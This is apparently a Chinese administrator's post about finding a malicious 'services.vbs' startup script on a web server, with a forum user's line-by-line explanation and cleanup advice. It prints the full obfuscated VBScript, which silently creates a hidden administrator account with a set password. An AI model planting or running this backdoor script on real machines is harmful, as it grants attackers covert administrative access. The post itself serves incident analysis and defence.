WEB服务器的安全对于管理员来说是很头疼的事,尤其是对于一台拥有众多客户站点的服务器来说,排查原因须细心!
今日登陆远程,发现在 开始启动项中有“services.vbs”文件:
打开一看:set wshshell=createobject ("wsc"&"ript.shell" )
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,"&"@yjk515 /a"&"dd",0)
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)
网友 shuhan0520 解说:
第一句,创建脚本运行的实例。
第二句,cmd.exe /c net user IUSR_DEBUG zf,@yjk515 /add ,0 意思是添加一个用户,用户名为IUSR_DEBUG,密码是zf,@yjk515。
第三句,cmd.exe /c net localgroup Administrators IUSR_DEBUG /add,0 意思是将IUSR_DEBUG加为管理组。
整个脚本的意思就是加了一个管理员,名称是IUSR_DEBUG。基本可以确定是被黑客入侵了,把这个用户干掉,把这个脚本也删掉,然后根据日志查找黑客入侵的途径,并作相应补救。
